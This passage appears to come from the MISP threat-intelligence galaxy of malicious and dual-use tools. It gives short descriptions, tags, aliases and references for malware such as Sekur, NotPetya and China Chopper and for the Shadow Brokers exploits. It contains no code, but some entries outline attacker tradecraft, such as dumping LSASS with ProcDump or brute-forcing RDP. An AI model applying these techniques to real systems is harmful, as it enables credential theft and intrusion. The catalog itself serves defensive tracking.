- similar: `misp-galaxy:malpedia="Korlia"` with `estimative-language:likelihood-probability="likely"

Table 6608. Table References

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**Sekur**

Sekur has been CARBON SPIDER’s primary tool for several years, although usage over the last year appears to have declined. It contains all the functionality you would expect from a RAT, allowing
the adversary to execute commands, manage the file system, manage processes, and collect data. In addition, it can record videos of victim sessions, log keystrokes, enable remote desktop, or install Ammyy Admin or VNC modules. From July 2014 on, samples were compiled with the capability to target Epicor POS systems and to collect credit card data.

The tag is: misp-galaxy:tool="Sekur"

Table 6609. Table References

Links
https://www.crowdstrike.com/blog/arrests-put-new-focus-on-carbon-spider-adversary-group/

Agent ORM

Agent ORM began circulating alongside Skeur in campaigns throughout the second half of 2015. The malware collects basic system information and is able to take screenshots of victim systems. It is used to download next-stage payloads when systems of interest are identified. It is strongly suspected that Agent ORM has been deprecated in favor of script-based first-stage implants (VB Flash, JS Flash, and Bateleur).

The tag is: misp-galaxy:tool="Agent ORM"

Agent ORM is also known as:

- Tosliph
- DRIFTPIN

Table 6610. Table References

Links
https://www.crowdstrike.com/blog/arrests-put-new-focus-on-carbon-spider-adversary-group/

VB Flash

VB Flash was first observed being deployed alongside Agent ORM in September 2015. It is likely that this was developed as a replacement to Agent ORM and contained similar capabilities. The first observed instance of VB Flash included comments and was easy to analyze—later versions soon began to integrate multiple layers of obfuscation. Several versions of VB Flash were developed including ones that utilized Google Forms, Google Macros, and Google Spreadsheets together to make a command-and-control (C2) channel. This variant would POST victim data to a specified Google form, then make a request to a Google macro script, receiving an address for a Google Spreadsheet from which to request commands.

The tag is: misp-galaxy:tool="VB Flash"

VB Flash is also known as:

- HALFBAKED
VB Flash has relationships with:

- similar: misp-galaxy:mitre-malware="HALFBAKED - S0151" with estimative-language:likelihood-probability="likely"

### JS Flash

JS Flash capabilities closely resemble those of VB Flash and leverage interesting techniques in deployment via batch scripts embedded as OLE objects in malicious documents. Many iterations of JS Flash were observed being tested before deployment, containing minor changes to obfuscation and more complex additions, such as the ability to download TinyMet (a cutdown of the Metasploit Meterpreter payload). PowerShell was also used heavily for the execution of commands and arbitrary script execution. No JS Flash samples were observed being deployed after November 2017.

The tag is: misp-galaxy:tool="JS Flash"

JS Flash is also known as:

- JavaScript variant of HALFBAKED

### Bateleur

Bateleur deployments began not long after JS Flash and were also written in JavaScript. Deployments were more infrequent and testing was not observed. It is likely that Bateleur was run in parallel as an alternative tool and eventually replaced JS Flash as CARBON SPIDER's first stage tool of choice. Although much simpler in design than JS Flash, all executing out of a single script with more basic obfuscation, Bateleur has a wealth of capabilities—including the ability to download arbitrary scripts and executables, deploy TinyMet, execute commands via PowerShell, deploy a credential stealer, and collect victim system information such as screenshots.

The tag is: misp-galaxy:tool="Bateleur"

Bateleur has relationships with:

- similar: misp-galaxy:malpedia="Bateleur" with estimative-language:likelihood-probability="likely"
JexBoss

A tool for testing and exploiting vulnerabilities in JBoss Application Servers.

The tag is: misp-galaxy:tool="JexBoss"

Table 6614. Table References

reGeorg

“Provides TCP tunneling over HTTP and bolts a SOCKS4/5 proxy on top of it, so, reGeorg is a fully-functional SOCKS proxy and gives ability to analyze target internal network.”

The tag is: misp-galaxy:tool="reGeorg"

reGeorg has relationships with:

• similar: misp-galaxy:malpedia="reGeorg" with estimative-language:likelihood-probability="likely"

Table 6615. Table References

Hyena

An Active Directory and Windows system management software, which can be used for remote administration of servers and workstations.

The tag is: misp-galaxy:tool="Hyena"

Table 6616. Table References
**csvde.exe**

Imports and exports data from Active Directory Lightweight Directory Services (AD LDS) using files that store data in the comma-separated value (CSV) format.

The tag is: `misp-galaxy:tool="csvde.exe"`

*Table 6617. Table References*

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**NLBrute**

A tool to brute-force Remote Desktop Protocol (RDP) passwords.

The tag is: `misp-galaxy:tool="NLBrute"`

*Table 6618. Table References*

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**xDedic RDP Patch**

Used to create new RDP user accounts.

The tag is: `misp-galaxy:tool="xDedic RDP Patch"`

*Table 6619. Table References*

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**xDedic SysScan**

Used to profile servers for potential sale on the dark net

The tag is: `misp-galaxy:tool="xDedic SysScan"`

*Table 6620. Table References*

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Wmiexec

A PsExec-like tool, which executes commands through Windows Management Instrumentation (WMI).

The tag is: misp-galaxy:tool="Wmiexec"

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RDPWrap

Allows a user to be logged in both locally and remotely at the same time.

The tag is: misp-galaxy:tool="RDPWrap"

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PsExec

A light-weight telnet-replacement that lets you execute processes on other systems, complete with full interactivity for console applications, without having to manually install client software. When a command is executed on a remote computer using PsExec, then the service PSEXESVC will be installed on that system, which means that an executable called psexesvc.exe will execute the commands.

The tag is: misp-galaxy:tool="PsExec"

PsExec has relationships with:

- similar: misp-galaxy:mitre-tool="PsExec - S0029" with estimative-language:likelihood-probability="likely"

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**PAExec**

A PsExec-like tool, which lets you launch Windows programs on remote Windows computers without needing to install software on the remote computer first. When the PAExec service is running on the remote computer, the name of the source system is added to service's name, e.g., `paexec-<id>-<source computer name>.exe`, which can help to identify the entry point of the attack.

The tag is: `misp-galaxy:tool="PAExec"`

**KEYMARBLE**

This Malware Analysis Report (MAR) is the result of analytic efforts between Department of Homeland Security (DHS) and the Federal Bureau of Investigation (FBI). Working with U.S. Government partners, DHS and FBI identified Trojan malware variants used by the North Korean government. This malware variant has been identified as KEYMARBLE. The U.S. Government refers to malicious cyber activity by the North Korean government as HIDDEN COBRA. For more information on HIDDEN COBRA activity.

The tag is: `misp-galaxy:tool="KEYMARBLE"`

KEYMARBLE has relationships with:

- similar: `misp-galaxy:malpedia="KEYMARBLE"` with `estimative-language:likelihood-probability="likely"`

**BISKVIT**

The BISKVIT Trojan is a multi-component malware written in C#. We dubbed this malware BISKVIT based on the namespaces used in the code, which contain the word “biscuit”. Unfortunately, there is already an existing unrelated malware called BISCUIT, so BISKVIT is used instead, which is the Russian translation of biscuit.

The tag is: `misp-galaxy:tool="BISKVIT"`
Sirefef

This family of malware uses stealth to hide its presence on your PC. Trojans in this family can do different things, including:

- Downloading and running other files
- Contacting remote hosts
- Disabling security features

Members of the family can also change search results, which can generate money for the hackers who use Sirefef.

The tag is: misp-galaxy:tool="Sirefef"

Sirefef is also known as:

- Win32/Sirefef

MagentoCore Malware

A Dutch security researcher has lifted the veil on a massive website hacking campaign that has infected 7,339 Magento stores with a script that collects payment card data from people shopping on the sites. The script is what industry experts call a "payment card scraper" or "skimmer." Hackers breach sites and modify their source code to load the script along with its legitimate files. The script usually loads on store checkout pages and secretly records payment card details entered in payment forms, data that it later sends to a server under the hacker's control.

The tag is: misp-galaxy:tool="MagentoCore Malware"

NotPetya

Threat actors deploy a tool, called NotPetya, with the purpose of encrypting data on victims' machines and rendering it unusable. The malware was spread through tax software that companies and individuals require for filing taxes in Ukraine. Australia, Estonia, Denmark, Lithuania, Ukraine, the United Kingdom, and the United States issued statements attributing NotPetya to Russian state-sponsored actors. In June 2018, the United States sanctioned Russian organizations believed to have assisted the Russian state-sponsored actors with the operation.
NotPetya is also known as:

- Not Petya

NotPetya has relationships with:

- similar: misp-galaxy:ransomware="Bad Rabbit" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:malpedia="EternalPetya" with estimative-language:likelihood-probability="likely"

Xbash

Xbash is a malware family that is targeting Linux and Microsoft Windows servers. We can tie this malware, which we have named Xbash, to the Iron Group, a threat actor group known for previous ransomware attacks. Xbash was developed using Python and converted into self-contained Linux ELF executables by abusing the legitimate tool PyInstaller for distribution. Xbash aimed on discovering unprotected services, deleting victim’s MySQL, PostgreSQL and MongoDB databases, and ransom for Bitcoins. Linux based systems are targeted for ransomware and botnet capabilities. The ransomware targets and deletes linux databases and there is no evidence of any functionality that makes recovery even possible by payment the ransom. Where as, windows based systems are targeted for coinmining & self-propagating capabilities. Xbash spreads by attacking weak passwords and unpatched vulnerabilities.

LoJax

rootkit for the Unified Extensible Firmware Interface (UEFI). Used by APT28. The researchers named the rootkit LoJax, after the malicious samples of the LoJack anti-theft software that were discovered earlier this year.

The tag is: misp-galaxy:tool="LoJax"
**Chainshot**

The new piece of malware, which received the name Chainshot, is used in the early stages of an attack to activate a downloader for the final payload in a malicious chain reaction.

The tag is: `misp-galaxy:tool="Chainshot"`

**CroniX**

The researchers named this campaign CroniX, a moniker that derives from the malware’s use of Cron to achieve persistence and Xhide to launch executables with fake process names. The cryptocurrency minted on victim’s computers is Monero (XMR), the coin of choice in cryptojacking activities. To make sure that rival activity does not revive, CroniX deletes the binaries of other cryptominers present on the system. Another action CroniX takes to establish supremacy on the machine is to check the names of the processes and kill those that swallow 60% of the CPU or more.

The tag is: `misp-galaxy:tool="CroniX"`

**FASTCash**

Treasury has identified a sophisticated cyber-enabled ATM cash out campaign we are calling FASTCash. FASTCash has been active since late 2016 targeting banks in Africa and Asia to remotely compromise payment switch application servers within banks to facilitate fraudulent transactions, primarily involving ATMs, to steal cash equivalent to tens of millions of dollars. FBI has attributed malware used in this campaign to the North Korean government. We expect FASTCash to continue targeting retail payment systems vulnerable to remote exploitation.

The tag is: `misp-galaxy:tool="FASTCash"`
**Zebrocy**

Zebrocy is a tool used by APT28, which has been observed since late 2015. The communications module used by Zebrocy transmits using HTTP. The implant has key logging and file exfiltration functionality and utilises a file collection capability that identifies files with particular extensions.

The tag is: misp-galaxy:tool="Zebrocy"

Zebrocy is also known as:

- Zekapab

**CoalaBot**

The tag is: misp-galaxy:tool="CoalaBot"

**DanderSpritz**

DanderSpritz consists entirely of plugins to gather intelligence, use exploits and examine already controlled machines. It is written in Java and provides a graphical windows interface similar to botnets administrative panels as well as a Metasploit-like console interface. It also includes its own backdoors and plugins for not-FuuZbuNch-controlled victims DanderSpritz is the framework for controlling infected machines, different from FuZZbuNch as the latter provides a limited toolkit for the post-exploitation stage with specific functions such as DisableSecurity and EnableSecurity for DarkPulsar. For DanderSpritz works for a larger range of backdoors, using PeddleCheap in the victim to enable operators launching plugins. PeddleCheap is a plugin of DanderSpritz which can be used to configure implants and connect to infected machines. Once a connection is established all DanderSpritz post-exploitation features become available.

The tag is: misp-galaxy:tool="DanderSpritz"

DanderSpritz is also known as:

- Dander Spritz

**DarkPulsar**

DarkPulsar is a very interesting administrative module for controlling a passive backdoor named...
‘sipauth32.tsp’ that provides remote control.

The tag is: misp-galaxy:tool="DarkPulsar"

DarkPulsar is also known as:

• Dark Pulsar

Table 6636. Table References

Links
https://securelist.com/darkpulsar/88199/

EASYFUN

EasyFun 2.2.0 Exploit for WDaemon / IIS MDaemon/WorldClient pre 9.5.6 WordClient / IIS6.0 exploit

The tag is: misp-galaxy:tool="EASYFUN"

Table 6637. Table References

Links
https://github.com/misterch0c/shadowbroker

ETCETERABLUE

an exploit for IMail 7.04 to 8.05

The tag is: misp-galaxy:tool="ETCETERABLUE"

Table 6638. Table References

Links
https://github.com/misterch0c/shadowbroker

EXPIREDPAYCHECK

IIS6 exploit

The tag is: misp-galaxy:tool="EXPIREDPAYCHECK"

Table 6639. Table References

Links
https://github.com/misterch0c/shadowbroker

EAGERLEVER

NBT/SMB exploit for Windows NT4.0, 2000, XP SP1 & SP2, 2003 SP1 & Base Release
The tag is: misp-galaxy:tool="EAGERLEVER"

Table 6640. Table References

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<tr>
<td><a href="https://github.com/misterch0c/shadowbroker">https://github.com/misterch0c/shadowbroker</a></td>
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ESSAYKEYNOTE

The tag is: misp-galaxy:tool="ESSAYKEYNOTE"

Table 6641. Table References

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<td><a href="https://github.com/misterch0c/shadowbroker">https://github.com/misterch0c/shadowbroker</a></td>
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EVADEFRED

The tag is: misp-galaxy:tool="EVADEFRED"

Table 6642. Table References

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<td><a href="https://github.com/misterch0c/shadowbroker">https://github.com/misterch0c/shadowbroker</a></td>
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NAMEDPIPETOUCH

Utility to test for a predefined list of named pipes, mostly AV detection. User can add checks for custom named pipes.

The tag is: misp-galaxy:tool="NAMEDPIPETOUCH"

Table 6643. Table References

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<tr>
<td><a href="https://github.com/misterch0c/shadowbroker">https://github.com/misterch0c/shadowbroker</a></td>
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GhostMiner

GhostMiner is a new cryptocurrency mining malware. By the end of March 2018, a new variant of mining malware was detected targeting MSSQL, phpMyAdmin, and Oracle WebLogic servers. The sample uses Powershell to execute code with volatile resources and scans the server’s processes to detect and stop other miners that might have been running prior to execution. The fileless malware has become more popular in the last years. The malicious code runs directly in main memory without writing any file on disk, where an antivirus engine could detect it.

The tag is: misp-galaxy:tool="GhostMiner"
August

August contains stealing functionality targeting credentials and sensitive documents from the infected computer.

The tag is: misp-galaxy:tool="August"

August is also known as:

- August Stealer

China Chopper

China Chopper is a publicly available, well-documented web shell, in widespread use since 2012.

The tag is: misp-galaxy:tool="China Chopper"

PNG Dropper

The PNG_dropper family primarily uses a modified version of the publicly available tool JPEGView.exe (version 1.0.32.1 – both x86 and x64 bit versions). Carbon Black Threat Research also observed where PNG_dropper malware was seen compiled into a modified version of the 7-Zip File Manager Utility (version 9.36.0.0 – x64 bit).

The tag is: misp-galaxy:tool="PNG Dropper"

PNG Dropper is also known as:

- PNG_Dropper
- PNGDropper
Rotexy

A mobile spyware that turned into a banking trojan with ransomware capabilities managed to launch over 70,000 attacks in the course of just three months.

The tag is: misp-galaxy:tool="Rotexy"

Rotexy is also known as:

• SMSThief

KingMiner

A recently discovered cryptomining operation forces access to Windows servers to use their CPU cycles for mining Monero coins. Detected six months ago, the activity went through multiple stages of evolution. Since it was spotted in mid-June, the malware received two updates and the number of attacks keeps increasing. The researchers at CheckPoint analyzed the new threat and gave it the name KingMiner. They found that it targets Microsoft IIS and SQL Servers in particular and runs a brute-force attack to gain access. Once in, the malware determines the CPU architecture and checks for older versions of itself to remove them.

The tag is: misp-galaxy:tool="KingMiner"

Taurus

Toolkit - building kit for crafting documents used to deliver attacks

The tag is: misp-galaxy:tool="Taurus"
**Terra Loader**

The tag is: *misp-galaxy:tool=*Terra Loader*"

**SpicyOmelette**

In 2018, CTU researchers observed several GOLD KINGSWOOD campaigns involving SpicyOmelette, a tool used by the group during initial exploitation of an organization. This sophisticated JavaScript remote access tool is generally delivered via phishing, and it uses multiple defense evasion techniques to hinder prevention and detection activities. GOLD KINGSWOOD delivered SpicyOmelette through a phishing email containing a shortened link that appeared to be a PDF document attachment. When clicked, the link used the Google AppEngine to redirect the system to a GOLD KINGSWOOD-controlled Amazon Web Services (AWS) URL that installed a signed JavaScript file, which was SpicyOmelette.

The tag is: *misp-galaxy:tool=*SpicyOmelette*"

**LamePyre**

When LamePyre runs on the system, users see the generic Automator icon in the menu bar, which is typical for any script of this sort. The script decodes a payload written in Python and runs it on the victim host. It then starts to take pictures and upload them to the attacker’s command and control (C2) server.

The tag is: *misp-galaxy:tool=*LamePyre*"
• OSX.LamePyre

Table 6653. Table References

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**DarthMiner**

The tag is: `misp-galaxy:tool="DarthMiner"`

Table 6654. Table References

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**OSX.BadWord**

The tag is: `misp-galaxy:tool="OSX.BadWord"`

Table 6655. Table References

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**OSX/Shlayer**

The initial Trojan horse infection (the fake Flash Player installer) component of OSX/Shlayer leverages shell scripts to download additional malware or adware onto the infected system. The primary goal of OSX/Shlayer is to download and install adware onto an infected Mac. Although "adware" may not sound like a big deal, it can be a lot more harmful than the name implies; be sure to watch our aforementioned interview with Amit Serper to learn more about one particular example of malicious Mac adware. At least one variant of the malware also appears to exhibit an interesting behavior: It checks whether one of several Mac anti-virus products is installed.

The tag is: `misp-galaxy:tool="OSX/Shlayer"`

Table 6656. Table References

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**Bushaloader**

The tag is: `misp-galaxy:tool="Bushaloader"`
**ANEL**

Backdoor

The tag is: `misp-galaxy:tool="ANEL"`

ANEL is also known as:

- UPPERCUT

**BabyShark**

BabyShark is a relatively new malware. The earliest sample we found from open source repositories and our internal data sets was seen in November 2018. The malware is launched by executing the first stage HTA from a remote location, thus it can be delivered via different file types including PE files as well as malicious documents. It exfiltrates system information to C2 server, maintains persistence on the system, and waits for further instruction from the operator.

The tag is: `misp-galaxy:tool="BabyShark"`

**StealthWorker**

Hackers are running a new campaign which drops the StealthWorker brute-force malware on Windows and Linux machines that end up being used to brute force other computers in a series of distributed brute force attacks. As unearthed by FortiGuard Labs' Rommel Joven, the StealthWorker Golang-based brute forcer (also known as GoBrut) discovered by Malwarebytes at the end of February is actively being used to target and compromise multiple platforms. StealthWorker was previously connected to a number of compromised Magento-powered e-commerce websites on
which attackers infiltrated skimmers designed to exfiltrate both payment and personal information. As later discovered, the malware is capable of exploiting a number of vulnerabilities in to infiltrate Magento, phpMyAdmin, and cPanel Content Management Systems (CMSs), as well as brute force its way in if everything else fails.

The tag is: misp-galaxy:tool="StealthWorker"

**Table 6660. Table References**

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**SLUB Backdoor**

The SLUB backdoor is a custom one written in the C++ programming language, statically linking curl library to perform multiple HTTP requests. Other statically-linked libraries are boost (for extracting commands from gist snippets) and JsonCpp (for parsing slack channel communication).

The tag is: misp-galaxy:tool="SLUB Backdoor"

SLUB Backdoor has relationships with:

- similar: misp-galaxy:backdoor="SLUB" with estimative-language:likelihood-probability="likely"

**Table 6661. Table References**

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**Carp Downloader**

In 2017, Unit 42 reported on and analyzed a low-volume malware family called Cardinal RAT. This malware family had remained undetected for over two years and was delivered via a unique downloader named Carp Downloader.

The tag is: misp-galaxy:tool="Carp Downloader"

**Table 6662. Table References**

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<tr>
<td><a href="https://unit42.paloaltonetworks.com/cardinal-rat-sins-again-targets-israeli-fin-tech-firms/">https://unit42.paloaltonetworks.com/cardinal-rat-sins-again-targets-israeli-fin-tech-firms/</a></td>
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</table>

**EVILNUM**

EVILNUM is a JavaScript-based malware family that is used in attacks against similar organizations.

The tag is: misp-galaxy:tool="EVILNUM"
EVILNUM has relationships with:

- similar: misp-galaxy:rat="Cardinal" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:tool="Cardinal RAT" with estimative-language:likelihood-probability="likely"

Table 6663. Table References

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<tr>
<td><a href="https://unit42.paloaltonetworks.com/cardinal-rat-sins-again-targets-israeli-fin-tech-firms/">https://unit42.paloaltonetworks.com/cardinal-rat-sins-again-targets-israeli-fin-tech-firms/</a></td>
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**Brushaloader**

Brushaloader also leverages a combination of VBScript and PowerShell to create a Remote Access Trojan (RAT) that allows persistent command execution on infected systems.

The tag is: misp-galaxy:tool="Brushaloader"

Table 6664. Table References

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<tr>
<td><a href="https://blog.talosintelligence.com/2019/02/combing-through-brushaloader.html">https://blog.talosintelligence.com/2019/02/combing-through-brushaloader.html</a></td>
</tr>
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</table>

**Karkoff**

In addition to increased reports of threat activity, we have also discovered new evidence that the threat actors behind the DNSpionage campaign continue to change their tactics, likely in an attempt to improve the efficacy of their operations. In February, we discovered some changes to the actors' tactics, techniques and procedures (TTPs), including the use of a new reconnaissance phase that selectively chooses which targets to infect with malware. In April 2019, we also discovered the actors using a new malware, which we are calling Karkoff.

The tag is: misp-galaxy:tool="Karkoff"

Table 6665. Table References

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**KimJongRAT**

We conclude that this RAT/stealer is efficient and was also really interesting to analyse. Furthermore, the creator made efforts to look Korean, for example the author of the .pdf file is Kim Song Chol. He is the brother of Kim Jong-un, the leader of North Korea. We identified that the author of a variant of this stealer is another brother of Kim Jong-un. Maybe the author named every variant with the name of each brother. After some searches using Google, we identified an old variant of this malware here: http://contagiodump.blogspot.ca/2010/10/oct-08-cve-2010-2883-pdf-nuclear.html. The code of the malware available on the blog is closest to our case but with fewer features. In 2010, the
password of the Gmail account was futurekimkim. Three years ago, the author was already fixated on the Kim family. The language of the resource stored in the .dll file is Korean (LANG_KOREAN). The owner of the Gmail mailbox is laoshi135.zhang and the secret question of this account is in Korean too. We don't know if the malware truly comes from Korea. However, thanks to these factors, we decided to name this sample KimJongRAT/Stealer.

The tag is: **misp-galaxy:tool=“KimJongRAT”**

**Table 6666. Table References**

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<tr>
<td><a href="https://malware.lu/assets/files/articles/RAP003_KimJongRAT-Stealer_Analysis.1.0.pdf">https://malware.lu/assets/files/articles/RAP003_KimJongRAT-Stealer_Analysis.1.0.pdf</a></td>
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**Cowboy**

Based on our research, it appears the malware author calls the encoded secondary payload “Cowboy” regardless of what malware family is delivered.

The tag is: **misp-galaxy:tool=“Cowboy”**

**Table 6667. Table References**

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**JasperLoader**

JasperLoader employs a multi-stage infection process that features several obfuscation techniques that make analysis more difficult. It appears that this loader was designed with resiliency and flexibility in mind, as evidenced in later stages of the infection process.

The tag is: **misp-galaxy:tool=“JasperLoader”**

**Table 6668. Table References**

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<tr>
<td><a href="https://blog.talosintelligence.com/2019/04/jasperloader-targets-italy.html?m=1">https://blog.talosintelligence.com/2019/04/jasperloader-targets-italy.html?m=1</a></td>
</tr>
</tbody>
</table>

**Scranos**

The malware Scranos infects with rootkit capabilities, burying deep into vulnerable Windows computers to gain persistent access — even after the computer restarts. Scranos only emerged in recent months, according to Bitdefender with new research out Tuesday, but the number of its infections has rocketed in the months since it was first identified in November.

The tag is: **misp-galaxy:tool=“Scranos”**

**Table 6669. Table References**
Reaver

Unit 42 has discovered a new malware family we've named “Reaver” with ties to attackers who use SunOrcal malware. SunOrcal activity has been documented to at least 2013, and based on metadata surrounding some of the C2s, may have been active as early as 2010. The new family appears to have been in the wild since late 2016 and to date we have only identified 10 unique samples, indicating it may be sparingly used. Reaver is also somewhat unique in the fact that its final payload is in the form of a Control panel item, or CPL file. To date, only 0.006% of all malware seen by Palo Alto Networks employs this technique, indicating that it is in fact fairly rare.

The tag is: *misp-galaxy:tool=*"Reaver"

Reaver has relationships with:

- similar: *misp-galaxy:tool=*"SunOrcal" with *estimative-language:likelihood-probability=*"roughly-even-chance"
- similar: *misp-galaxy:tool=*"SURTR" with *estimative-language:likelihood-probability=*"roughly-even-chance"

SURTR

The Citizen Lab analyzed a malicious email sent to Tibetan organizations in June 2013. The email in question purported to be from a prominent member of the Tibetan community and repurposed content from a community mailing list. Attached to the email were what appeared to be three Microsoft Word documents (.doc), but which were trojaned with a malware family we call “Surtr”.1 All three attachments drop the exact same malware. We have seen the Surtr malware family used in attacks on Tibetan groups dating back to November 2012.

The tag is: *misp-galaxy:tool=*"SURTR"

SURTR has relationships with:

- similar: *misp-galaxy:tool=*"Reaver" with *estimative-language:likelihood-probability=*"roughly-
SunOrcal

SunOrcal is a trojan malware family whose activity dates back to at least 2013. A version discovered in November 2017 incorporates steganography techniques and can collect C2 information via GitHub, obscuring its C2 infrastructure and evading detection using the legitimate site for its first beacon. The threat actors have targeted users in the Vietnam area, spreading phishing emails containing malicious documents purportedly regarding South China Sea disputes. The new SunOrcal version has also been used with the recently discovered Reaver trojan and the original SunOrcal version. Some of the recent activity also incorporates the use of the Surtr malware.

The tag is: misp-galaxy:tool="SunOrcal"

SunOrcal has relationships with:

- similar: misp-galaxy:tool="Reaver" with estimative-language:likelihood-probability="roughly-even-chance"
- similar: misp-galaxy:tool="SURTR" with estimative-language:likelihood-probability="roughly-even-chance"

Bookworm

Threat actors have delivered Bookworm as a payload in attacks on targets in Thailand. Readers who are interested in this campaign should start with our first blog that lays out the overall functionality of the malware and introduces its many components. Unit 42 does not have detailed targeting information for all known Bookworm samples, but we are aware of attempted attacks on at least two branches of government in Thailand. We speculate that other attacks delivering Bookworm were also targeting organizations in Thailand based on the contents of the associated decoys documents, as well as several of the dynamic DNS domain names used to host C2 servers that contain the words “Thai” or “Thailand”. Analysis of compromised systems seen communicating with Bookworm C2 servers also confirms our speculation on targeting with a majority of systems
existing within Thailand.

The tag is: misp-galaxy:tool="Bookworm"

**Table 6673. Table References**

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<tbody>
<tr>
<td><a href="https://unit42.paloaltonetworks.com/attack-campaign-on-the-government-of-thailand-delivers-bookworm-trojan/">https://unit42.paloaltonetworks.com/attack-campaign-on-the-government-of-thailand-delivers-bookworm-trojan/</a></td>
</tr>
<tr>
<td><a href="https://unit42.paloaltonetworks.com/bookworm-trojan-a-model-of-modular-architecture/">https://unit42.paloaltonetworks.com/bookworm-trojan-a-model-of-modular-architecture/</a></td>
</tr>
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</table>

**Amavaldo**

We named the malware family described in the rest of this blog post Amavaldo. This family is still in active development – the latest version we have observed (10.7) has a compilation timestamp of June 10th, 2019.

The tag is: misp-galaxy:tool="Amavaldo"

**Table 6674. Table References**

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**TVSPY**

hacker going by the handle Mr. Burns. He also created something similar called RMS, which behaves very much like the TVSPY builder. “RMS/TVSPY continues to be developed, with a new version being posted by the developer/reseller on a regular basis,” Damballa researchers noted. “In fact, the legitimate RMS version developed by TektonIT and the version posted in criminal forums appear to be identical. TVSPY seems to be merely a modification of RMS to utilize TeamViewer infrastructure and a command-and-control interface manageable through the Web.

The tag is: misp-galaxy:tool="TVSPY"

TVSPY is also known as:

- TVRAT
- SpY-Agent
- teamspy

**Table 6675. Table References**

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<tbody>
<tr>
<td><a href="https://mobile.twitter.com/SaudiDFIR/status/1177740045186457600">https://mobile.twitter.com/SaudiDFIR/status/1177740045186457600</a></td>
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</table>
COMpfun

The COMpfun malware was initially documented by G-DATA in 2014. Although G-DATA didn’t identify which actor was using this malware, Kaspersky tentatively linked it to the Turla APT, based on the victimology. Our telemetry indicates that the current campaign using Reductor started at the end of April 2019 and remained active at the time of writing (August 2019). We identified targets in Russia and Belarus.

The tag is: misp-galaxy:tool="COMpfun"

Table 6676. Table References

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<tr>
<td><a href="https://securelist.com/compfun-successor-reductor/93633/">https://securelist.com/compfun-successor-reductor/93633/</a></td>
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Reductor

We called these new modules ‘Reductor’ after a .pdb path left in some samples. Besides typical RAT functions such as uploading, downloading and executing files, Reductor’s authors put a lot of effort into manipulating digital certificates and marking outbound TLS traffic with unique host-related identifiers. The Kaspersky Attribution Engine shows strong code similarities between this family and the COMPfun Trojan. Moreover, further research showed that the original COMpfun Trojan most probably is used as a downloader in one of the distribution schemes. Based on these similarities, we’re quite sure the new malware was developed by the COMPfun authors.

The tag is: misp-galaxy:tool="Reductor"

Table 6677. Table References

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<tr>
<td><a href="https://securelist.com/compfun-successor-reductor/93633/">https://securelist.com/compfun-successor-reductor/93633/</a></td>
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</table>

ProcDump

Legitimate tool - command-line tool used to monitor a running process and dump memory depending on custom criteria. The attackers use this tool to dump the LSASS process to gather WINDOWS credentials hashes

The tag is: misp-galaxy:tool="ProcDump"

CertMig

Legitimate tool - command-line tool used to import and export certificates on a machine. The attackers use this tool to gather credentials used for VPN authentication to the clients’ networks

The tag is: misp-galaxy:tool="CertMig"
Netscan

Legitimate tool - tool used to scan IPv4/IPv6 networks and remotely execute PowerShell commands.

The tag is: misp-galaxy:tool="Netscan"

ShadowHammer

Malware embedded in Asus Live Update in 2018. ShadowHammer triggers its malicious behavior only if the computer it is running on has a network adapter with the MAC address whitelisted by the attacker.

The tag is: misp-galaxy:tool="ShadowHammer"

Table 6678. Table References

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DePriMon

DePriMon is a malicious downloader, with several stages and using many non-traditional techniques. To achieve persistence, the malware registers a new local port monitor – a trick falling under the “Port Monitors” technique in the MITRE ATT&CK knowledgebase. For that, the malware uses the “Windows Default Print Monitor” name; that's why we have named it DePriMon. Due to its complexity and modular architecture, we consider it to be a framework.

The tag is: misp-galaxy:tool="DePriMon"

Table 6679. Table References

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Private Internet Access

Private Internet Access provides state of the art, multi-layered security with advanced privacy protection using VPN tunneling.

The tag is: misp-galaxy:tool="Private Internet Access"

Private Internet Access is also known as:

- PIA
Netcat

Reads from and writes to network connections using TCP or UDP protocols.

The tag is: \texttt{misp-galaxy:tool="Netcat"}

NBTScan

NBTScan is a program for scanning IP networks for NetBIOS name information (similar to what the Windows nbtstat tool provides against single hosts). It sends a NetBIOS status query to each address in a supplied range and lists received information in human readable form. For each responded host it lists IP address, NetBIOS computer name, logged-in user name and MAC address.

The tag is: \texttt{misp-galaxy:tool="NBTScan"}

PowerGhost

PowerGhost is capable of stealthily establishing itself in a system and spreading across large corporate networks infecting both workstations and servers. This type of hidden consolidation is typical of miners: the more machines that get infected and the longer they remain that way, the greater the attacker's profits. Therefore, it's not uncommon to see clean software being infected with a miner; the popularity of the legitimate software serves to promote the malware's proliferation. The creators of PowerGhost, however, went further and started using fileless techniques to establish the illegal miner within the victim system.

The tag is: \texttt{misp-galaxy:tool="PowerGhost"}

VBEmail

Check Point researchers have found another wave of the Ursnif malspam campaign targeting Italy. Only a few details are known so far but what we have found is that the file delivered is a VBE file (encoded VBS) named “SCANSIONE.vbe” and is delivered via ZIP attachments in emails with the subject suggesting different documents in Italian.
ZeroCleare

ZeroCleare was used to execute a destructive attack that affected organizations in the energy and industrial sectors in the Middle East. Based on the analysis of the malware and the attackers’ behavior, we suspect Iran-based nation state adversaries were involved to develop and deploy this new wiper.

Dustman

At the heart of the recent Bapco attack is a new strain of malware named Dustman. According to an analysis by Saudi Arabia’s cyber-security agency, Dustman is a so-called data wiper—malware designed to delete data on infected computers, once launched into execution. Dustman represents the third different data-wiping malware linked to the Tehran regime. Iranian state-backed hackers have a long history of developing data-wiping malware.

Autochk Rootkit

This rootkit is a very simple. The name of the driver is “autochk.sys” - that’s why we’ll call it the autochk rootkit. The rootkit implements 2 functionalities: File Redirection and Network Connection Hiding.
Lampion

New trojan called Lampion has spread using template emails from the Portuguese Government Finance & Tax during the last days of 2019.

The tag is: misp-galaxy:tool="Lampion"

Table 6687. Table References

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LiquorBot

Bitdefender researchers tracked the development of a Mirai-inspired botnet, dubbed LiquorBot, which seems to be actively in development and has recently incorporated Monero cryptocurrency mining features.

The tag is: misp-galaxy:tool="LiquorBot"

Table 6688. Table References

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Gelup malware tool

Written in C++ and designed to function as a downloader of other malware, Gelup stood out for its obfuscation techniques. Gelup can also bypass User Account Control (UAC) by mocking trusted directories, abusing auto-elevated executables and using the Dynamic Link Library (DLL) side-loading technique.

The tag is: misp-galaxy:tool="Gelup malware tool"

Gelup malware tool is also known as:

- AndroMut

Table 6689. Table References

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**DenesRAT**

DenesRAT is a private Trojan horse of the "Sea Lotus" organization, which can perform corresponding functions according to the instructions issued by the C2 server. The main functions are file operations, such as creating files or directories, deleting files or directories, finding files; registry reading and writing; remote code execution, such as creating processes, executing DLLs, etc....

